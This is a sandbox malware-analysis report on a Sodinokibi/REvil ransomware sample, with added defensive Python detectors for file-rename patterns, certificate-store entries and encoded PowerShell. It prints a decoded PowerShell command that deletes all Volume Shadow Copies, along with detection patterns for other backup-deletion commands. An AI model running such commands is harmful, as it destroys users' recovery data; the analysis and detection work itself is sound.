Analysis
- max time kernel: 142s
- max time network: 147s
- platform: windows10_x64
- resource: win10
- submitted: 20-08-2020 13:03
Static task: static1
Behavioral task: behavioral1
  Sample: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
  Resource: win7
Behavioral task: behavioral2
  Sample: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
  Resource: win10
General
- Target: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
- Size: 115KB
- MD5: 35766bd0b389c682306437d45ba5c4e6
- SHA1: b837df01d31c1bfff0e54f07076323d075a4bf27
- SHA256: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a
- SHA512: e20472ae28857e4dd7b021e23366623cf6b3f9a4818b09c36997b1428220d244da760ff61aaa11de690278152fb551e2a002f7ff19e1cf60ad625845772930c6
Malware Config
Extracted from: C:\1g3wd8r-readme.txt
- Family: sodinokibi
- URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/887C53C24A330C29
  http://decryptor.cc/887C53C24A330C29
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Modifies extensions of user files (12 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe (all rows below)
  description | ioc
  File renamed | C:\Users\Admin\Pictures\SelectGroup.png => \??\c:\users\admin\pictures\SelectGroup.png.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\RestartRegister.crw => \??\c:\users\admin\pictures\RestartRegister.crw.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\UpdateSend.crw => \??\c:\users\admin\pictures\UpdateSend.crw.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\WriteRead.png => \??\c:\users\admin\pictures\WriteRead.png.1g3wd8r
  File opened for modification | \??\c:\users\admin\pictures\RequestPublish.tiff
  File renamed | C:\Users\Admin\Pictures\NewUpdate.tif => \??\c:\users\admin\pictures\NewUpdate.tif.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\InitializeRename.png => \??\c:\users\admin\pictures\InitializeRename.png.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\MoveResolve.crw => \??\c:\users\admin\pictures\MoveResolve.crw.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\MeasureSubmit.raw => \??\c:\users\admin\pictures\MeasureSubmit.raw.1g3wd8r
  File renamed | C:\Users\Admin\Pictures\RequestPublish.tiff => \??\c:\users\admin\pictures\RequestPublish.tiff.1g3wd8r
  File opened for modification | \??\c:\users\admin\pictures\DisableExit.tiff
  File renamed | C:\Users\Admin\Pictures\DisableExit.tiff => \??\c:\users\admin\pictures\DisableExit.tiff.1g3wd8r
  The pattern is the usual encrypt-in-place one: the original name is kept and a single new extension (.1g3wd8r) is appended, and the two "opened for modification" rows are the same .tiff files that are renamed later in the list. The same token appears in the ransom-note name (1g3wd8r-readme.txt), which is the cheapest way to tie note and encrypted files to one run.
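The heuristic behind this signature, written out as an added example (my code, not part of the sandbox or the report): over a list of file events in the report's own "description ioc" form, look for one extension being appended to many files whose names are otherwise unchanged, and tie it to any created file whose name carries the same token. The event list is constructed from a subset of the rows above plus one benign rename (draft.tmp to draft.docx) that is not in the report and exists only to show what the check ignores; the threshold of three renames is an assumption.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: rows from the report above plus one benign rename (the last
# entry) that is NOT from the report, added only to show what the heuristic skips.
EVENTS = [
    r"File renamed C:\Users\Admin\Pictures\SelectGroup.png => \??\c:\users\admin\pictures\SelectGroup.png.1g3wd8r",
    r"File renamed C:\Users\Admin\Pictures\RestartRegister.crw => \??\c:\users\admin\pictures\RestartRegister.crw.1g3wd8r",
    r"File renamed C:\Users\Admin\Pictures\NewUpdate.tif => \??\c:\users\admin\pictures\NewUpdate.tif.1g3wd8r",
    r"File renamed C:\Users\Admin\Pictures\MeasureSubmit.raw => \??\c:\users\admin\pictures\MeasureSubmit.raw.1g3wd8r",
    r"File opened for modification \??\c:\users\admin\pictures\RequestPublish.tiff",
    r"File created \??\c:\program files\1g3wd8r-readme.txt",
    r"File created \??\c:\program files (x86)\1g3wd8r-readme.txt",
    r"File renamed C:\Users\Admin\Documents\draft.tmp => \??\c:\users\admin\documents\draft.docx",
]

RENAME_RE = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+)$")
CREATE_RE = re.compile(r"^File created (?P<path>.+)$")
NT_PREFIX = "\\??\\"   # the sandbox logs destination paths with the NT object-manager prefix


def normalize(path):
    """Drop the NT prefix and case so both sides of a rename can be compared."""
    if path.startswith(NT_PREFIX):
        path = path[len(NT_PREFIX):]
    return path.lower()


def appended_suffix(src, dst):
    """Extension that dst adds to an otherwise unchanged src, or None."""
    src, dst = normalize(src), normalize(dst)
    if not dst.startswith(src + "."):
        return None
    extra = dst[len(src) + 1:]
    return extra if extra and "." not in extra and "\\" not in extra else None


def scan(events, min_renames=3):
    """Flag every suffix appended to at least min_renames files, with the original
    extensions it covered and any created file whose name carries the same token."""
    renames, orig_exts, created = Counter(), defaultdict(set), []
    for ev in events:
        m = RENAME_RE.match(ev)
        if m:
            sfx = appended_suffix(m["src"], m["dst"])
            if sfx:
                renames[sfx] += 1
                orig_exts[sfx].add(normalize(m["src"]).rsplit(".", 1)[-1])
            continue
        m = CREATE_RE.match(ev)
        if m:
            created.append(normalize(m["path"]))
    findings = []
    for sfx, n in renames.items():
        if n >= min_renames:
            notes = [p for p in created if sfx in p.rsplit("\\", 1)[-1]]
            findings.append({"extension": sfx, "renames": n,
                             "original_extensions": sorted(orig_exts[sfx]),
                             "ransom_notes": notes})
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f)
```

Requiring the source name to survive intact is what separates this from ordinary extension changes (a save-as from .tmp to .docx never qualifies), and counting distinct original extensions under one appended suffix is a stronger signal than the raw rename count.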
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe (all rows below)
  description | ioc
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
  description | ioc
  Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\k4bw98d.bmp"
- Drops file in Program Files directory (15 IoCs)
  Processes: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe (all rows below)
  description | ioc
  File opened for modification | \??\c:\program files\PushDismount.ps1xml
  File opened for modification | \??\c:\program files\ExitMerge.scf
  File opened for modification | \??\c:\program files\PublishRestore.zip
  File opened for modification | \??\c:\program files\PopSync.xlt
  File opened for modification | \??\c:\program files\ProtectEnter.temp
  File opened for modification | \??\c:\program files\TraceCompress.wps
  File created | \??\c:\program files\1g3wd8r-readme.txt
  File opened for modification | \??\c:\program files\OptimizeWait.mp2
  File opened for modification | \??\c:\program files\GetJoin.ttc
  File opened for modification | \??\c:\program files\MovePush.wma
  File created | \??\c:\program files (x86)\1g3wd8r-readme.txt
  File opened for modification | \??\c:\program files\ConfirmProtect.htm
  File opened for modification | \??\c:\program files\SetShow.docx
  File opened for modification | \??\c:\program files\CompareApprove.js
  File opened for modification | \??\c:\program files\GroupDismount.wmf
- Modifies system certificate store
  Processes: 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe (both rows below)
  description | ioc
  Key created | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\A416002331A4E0C8C53D94AC1E0234723D8BDE97
  Set value (data) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\A416002331A4E0C8C53D94AC1E0234723D8BDE97\Blob = 030000000100000014000000a416002331a4e0c8c53d94ac1e0234723d8bde971400000001000000140000008180d62879354a5b793589398f12176e117b2c1104000000010000001000000058bec6c6284db2ea1a8aca560691ff0f0f0000000100000020000000eed0b2ecc538897b88bde1b187557738b9d695936927b6d8c88ce131e34f675e190000000100000010000000603338adfa4a38f9199fb173f33983115c000000010000000400000000080000180000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f20000000010000007b040000308204773082035fa003020102020d01ee5f222de71b43a5d4669f9e300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3138313132313030303030305a170d3238313132313030303030305a3050310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d7361312630240603550403131d476c6f62616c5369676e205253412044562053534c204341203230313830820122300d06092a864886f70d01010105000382010f003082010a0282010100a8fb55f5fff090abffe7ef41bd683052e7fd32edc9f515f7c0b9af31709852521698d1e12d698067c56c5b7a2cf973b9ab9a85bd84336bd983af80f99dfa5290338fc0940a0a43aa3ada27a375cbd02d6a3a20dd779ffc476054356e33f4b3ba85a9f3467e6c5616e8a61e5300c6b4f28629f35b7a4030d8a8b72962ab7821c518c4dc61f9cc18963637ea4b9bcf6ecac467ab0345d75834bdbae36838fc5dc4a19082d51d3868c5d5a0a9732c9c8ab7dd70e049d70bf034c9ec3e3f754b821048691aff8bce9b1cc294ecb7dd4bd5b4e4590e188215f11bf3d8c77adac9963b57935538beb0ff20dbaf952c08bdaae3543945a31cf1f782d2cb4d61c20686250203010001a38201523082014e300e0603551d0f0101ff04040302018630270603551d250420301e06082b0601050507030106082b0601050507030206082b0601050507030930120603551d130101ff040830060101ff020100301d0603551d0e041604148180d62879354a5b793589398f12176e117b2c11301f0603551d230418301680148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc303e06082b0601050507010104323030302e06082b060105050730018622687474703a2f2f6f637370322e676c6f62616c7369676e2e636f6d2f726f6f74723330360603551d1f042f302d302ba029a0278625687474703a2f2f63726c2e676c6f62616c7369676e2e636f6d2f726f6f742d72332e63726c30470603551d200440303e303c0604551d20003034303206082b06010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2e636f6d2f7265706f7369746f72792f300d06092a864886f70d01010b050003820101004205854cdd9608e64fe853a78b382d86d4373c3ae4f10e2e794058a7d1fdd467f4847b9c9d8ef6707b6c846d6224aa8eb0bb90f9ec1516d5d511a2b519e275e42b7d444bd8b24c57c0f8112dfffee3f9ac96a909866e2308659da6e4837f43a7d2b992abe37bfdd68ec9a4d7a9c92177aafe631f64aecd1e239b60737a7e29ca57866af0b65e472a85c290502d60f22eb55b8b3919448930f89a357891279095a40bfd9403180f6e5eab038f827fa2447bfebb81c9e12e87c68a5a0052985ee815ab0a5cf29d4db212f43f4504f29b62fbb5aaebc8fc042c1a9419b2f8d125b16ed60536d2584b6180b63c62bca302b6dd36633968253a7ba28ba3141b092233
  The key sits in the per-user intermediate-CA cache (HKCU\Software\Microsoft\SystemCertificates\CA), and the Blob is a CryptoAPI serialized certificate context. The certificate inside it is the "GlobalSign RSA DV SSL CA 2018" intermediate, issued by GlobalSign Root CA - R3 and valid from 2018-11-21 to 2028-11-21; the key name A416002331A4E0C8C53D94AC1E0234723D8BDE97 is its SHA-1 thumbprint. CryptoAPI writes exactly this kind of entry when it builds a chain for a TLS connection, so this signature on its own does not show the sample installing a trust anchor; it is better read as a side effect of an HTTPS connection made from the sample's process.
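To check that reading rather than trust the signature name, the Blob can be decoded offline. The following is an added example (my code, not part of the sandbox or the report) that splits the serialized certificate context into its properties, pulls out the DER certificate, reads issuer and subject CN with a minimal DER walker, and verifies that the SHA-1 of the certificate equals the thumbprint property (and the registry key name), and that the key-identifier property appears inside the certificate's SubjectKeyIdentifier extension. The hex is the Blob value from the report, split at property and field boundaries; the property-ID names are the wincrypt.h constants I am certain of, and the one I am not (92) is left unnamed.

```python
import hashlib
import struct

# Blob value recorded above under HKCU\Software\Microsoft\SystemCertificates\CA\Certificates\
# A416002331A4E0C8C53D94AC1E0234723D8BDE97, copied from the report and split at boundaries.
BLOB_HEX = "".join([
    "030000000100000014000000a416002331a4e0c8c53d94ac1e0234723d8bde97",   # prop 3: SHA-1 hash
    "1400000001000000140000008180d62879354a5b793589398f12176e117b2c11",   # prop 20: key identifier
    "04000000010000001000000058bec6c6284db2ea1a8aca560691ff0f",           # prop 4: MD5 hash
    "0f0000000100000020000000eed0b2ecc538897b88bde1b187557738b9d695936927b6d8c88ce131e34f675e",
    "190000000100000010000000603338adfa4a38f9199fb173f3398311",           # prop 25
    "5c000000010000000400000000080000180000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f",
    "20000000010000007b040000",                                           # prop 32: cert, 0x47b bytes
    "308204773082035fa003020102020d01ee5f222de71b43a5d4669f9e300d06092a864886f70d01010b0500",
    "304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d2052333113",
    "3011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e",
    "301e170d3138313132313030303030305a170d3238313132313030303030305a",
    "3050310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d7361",
    "312630240603550403131d476c6f62616c5369676e205253412044562053534c2043412032303138",
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100",
    "a8fb55f5fff090abffe7ef41bd683052e7fd32edc9f515f7c0b9af31709852521698d1e12d698067c56c5b7a2cf973b9",
    "ab9a85bd84336bd983af80f99dfa5290338fc0940a0a43aa3ada27a375cbd02d6a3a20dd779ffc476054356e33f4b3ba",
    "85a9f3467e6c5616e8a61e5300c6b4f28629f35b7a4030d8a8b72962ab7821c518c4dc61f9cc18963637ea4b9bcf6eca",
    "c467ab0345d75834bdbae36838fc5dc4a19082d51d3868c5d5a0a9732c9c8ab7dd70e049d70bf034c9ec3e3f754b8210",
    "48691aff8bce9b1cc294ecb7dd4bd5b4e4590e188215f11bf3d8c77adac9963b57935538beb0ff20dbaf952c08bdaae3",
    "543945a31cf1f782d2cb4d61c20686250203010001",
    "a38201523082014e300e0603551d0f0101ff040403020186",
    "30270603551d250420301e06082b0601050507030106082b0601050507030206082b06010505070309",
    "30120603551d130101ff040830060101ff020100301d0603551d0e041604148180d62879354a5b793589398f12176e117b2c11",
    "301f0603551d230418301680148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc",
    "303e06082b0601050507010104323030302e06082b060105050730018622687474703a2f2f6f637370322e676c6f62616c7369676e2e636f6d2f726f6f747233",
    "30360603551d1f042f302d302ba029a0278625687474703a2f2f63726c2e676c6f62616c7369676e2e636f6d2f726f6f742d72332e63726c",
    "30470603551d200440303e303c0604551d20003034303206082b06010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2e636f6d2f7265706f7369746f72792f",
    "300d06092a864886f70d01010b05000382010100",
    "4205854cdd9608e64fe853a78b382d86d4373c3ae4f10e2e794058a7d1fdd467f4847b9c9d8ef6707b6c846d6224aa8e",
    "b0bb90f9ec1516d5d511a2b519e275e42b7d444bd8b24c57c0f8112dfffee3f9ac96a909866e2308659da6e4837f43a7",
    "d2b992abe37bfdd68ec9a4d7a9c92177aafe631f64aecd1e239b60737a7e29ca57866af0b65e472a85c290502d60f22e",
    "b55b8b3919448930f89a357891279095a40bfd9403180f6e5eab038f827fa2447bfebb81c9e12e87c68a5a0052985ee8",
    "15ab0a5cf29d4db212f43f4504f29b62fbb5aaebc8fc042c1a9419b2f8d125b16ed60536d2584b6180b63c62bca302b6",
    "dd36633968253a7ba28ba3141b092233",
])

PROP_NAMES = {3: "SHA1_HASH", 4: "MD5_HASH", 15: "SIGNATURE_HASH", 20: "KEY_IDENTIFIER",
              24: "ISSUER_PUBLIC_KEY_MD5_HASH", 25: "SUBJECT_PUBLIC_KEY_MD5_HASH", 32: "CERT"}

def parse_capi_blob(blob):
    """[(prop_id, data)]; each property has a 12-byte header: DWORD id, DWORD 1, DWORD length."""
    props, off = [], 0
    while off < len(blob):
        prop_id, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if off + length > len(blob):
            raise ValueError("truncated property %d" % prop_id)
        props.append((prop_id, blob[off:off + length]))
        off += length
    return props

def der_tlv(buf, off):
    """Decode one DER tag/length; return (tag, content_start, content_end)."""
    tag, ln, off = buf[off], buf[off + 1], off + 2
    if ln & 0x80:                                   # long-form length
        n = ln & 0x7F
        ln, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, off, off + ln

def der_children(buf, start, end):
    off = start
    while off < end:
        tag, vs, ve = der_tlv(buf, off)
        yield tag, vs, ve
        off = ve

def name_cn(buf, start, end):
    """commonName of an X.501 Name: SEQUENCE OF SET OF SEQUENCE { OID, value }."""
    for _, ss, se in der_children(buf, start, end):
        for _, as_, ae in der_children(buf, ss, se):
            (_, os_, oe), (_, vs, ve) = list(der_children(buf, as_, ae))[:2]
            if buf[os_:oe] == bytes.fromhex("550403"):   # OID 2.5.4.3
                return buf[vs:ve].decode("latin-1")
    return None

def summarize(blob_hex=BLOB_HEX):
    plist = parse_capi_blob(bytes.fromhex(blob_hex))
    props = dict(plist)
    cert = props[32]
    _, cs, _ = der_tlv(cert, 0)                     # Certificate
    _, ts, te = der_tlv(cert, cs)                   # tbsCertificate
    fields = list(der_children(cert, ts, te))
    if fields[0][0] == 0xA0:                        # drop the explicit [0] version
        fields = fields[1:]
    issuer, subject = fields[2], fields[4]          # serial, sigAlg, issuer, validity, subject
    return {
        "props": [PROP_NAMES.get(p, "prop_%d" % p) for p, _ in plist],
        "issuer_cn": name_cn(cert, issuer[1], issuer[2]),
        "subject_cn": name_cn(cert, subject[1], subject[2]),
        "thumbprint_matches": hashlib.sha1(cert).hexdigest() == props[3].hex(),
        "ski_in_cert": props[20] in cert,
    }
```

Run `summarize()` and the two boolean checks come back True, with subject CN "GlobalSign RSA DV SSL CA 2018" and issuer CN "GlobalSign": a public intermediate, cached in the user's CA store, not a self-signed root planted under Root or AuthRoot. The same parser applied to a Blob under ...\SystemCertificates\Root\Certificates is where an actual trust-store tampering finding would come from.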
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid | process
  2892 | 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
  2892 | 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
  3884 | powershell.exe
  3884 | powershell.exe
  3884 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 2892 | 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
  Token: SeDebugPrivilege | 3884 | powershell.exe
  Token: SeBackupPrivilege | 996 | vssvc.exe
  Token: SeRestorePrivilege | 996 | vssvc.exe
  Token: SeAuditPrivilege | 996 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 2892 | 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  description | pid | process | target process
  PID 2892 wrote to memory of 3884 | 2892 | 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe | powershell.exe
  PID 2892 wrote to memory of 3884 | 2892 | 591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe | powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe (PID 2892)
  Command line: "C:\Users\Admin\AppData\Local\Temp\591d971b9411860904bc7fb9234d9069e3e8cacd06523b0bf93547bc2c4a827a.bin.exe"
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3884, child of 2892)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    Decoded (-e takes base64 of a UTF-16LE script): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    This deletes every Volume Shadow Copy through WMI, removing the local restore points that could otherwise be used to recover the encrypted files.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 748)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 996)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken

unsecapp.exe and vssvc.exe are not children of the sample. unsecapp.exe is the WMI callback host that COM starts with -Embedding, and the VSS service is started when the Win32_Shadowcopy class is queried; that is why the VSS\Diag keys and the SeBackupPrivilege/SeRestorePrivilege token adjustments are attributed to vssvc.exe rather than to the sample or to powershell.exe. The two WriteProcessMemory events from 2892 into 3884 are consistent with ordinary creation of the PowerShell child rather than injection into an unrelated process.
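The encoded command above is the part of this report most worth automating, because the shadow-copy deletion is only visible after decoding. The following is an added example (my code, not part of the sandbox or the report) that decodes a PowerShell -e payload the way PowerShell does (base64, then UTF-16LE) and matches both the raw command line and the decoded script against a small list of shadow-copy tampering patterns. The command line is the one recorded for PID 3884 above; the pattern list, the accepted -e abbreviations and the helper that builds encoded command lines for tests are my additions.

```python
import base64
import re

# Command line of PID 3884 from the process tree above.
CMDLINE = ("powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMA"
           "bwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones
# (an assumption to extend if your telemetry shows others).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Shadow-copy tampering patterns, matched case-insensitively against the raw command line
# and against the decoded script.
SHADOW_PATTERNS = [
    r"win32_shadowcopy[\s\S]*\bdelete\b",     # WMI: Get-WmiObject / Get-CimInstance ... .Delete()
    r"vssadmin(\.exe)?\s+delete\s+shadows",
    r"wmic(\.exe)?\s+shadowcopy\s+delete",
    r"wbadmin(\.exe)?\s+delete\s+catalog",
]


def encode_command(script):
    """Build the 'powershell -e ...' form, the way an attacker (or a test) would."""
    return "powershell -e " + base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script, or None when there is no valid -e payload."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def shadow_copy_tampering(cmdline):
    """(decoded script or None, [matched patterns]) for one process command line."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    hits = [p for p in SHADOW_PATTERNS if any(re.search(p, t, re.IGNORECASE) for t in texts)]
    return decoded, hits


if __name__ == "__main__":
    print(shadow_copy_tampering(CMDLINE))
```

Matching the decoded text as well as the raw command line is the whole point: a rule that only looks for "vssadmin delete shadows" in process creation events never sees this sample's variant, and the same decoder applies to -EncodedCommand payloads that wrap vssadmin or wmic inside PowerShell.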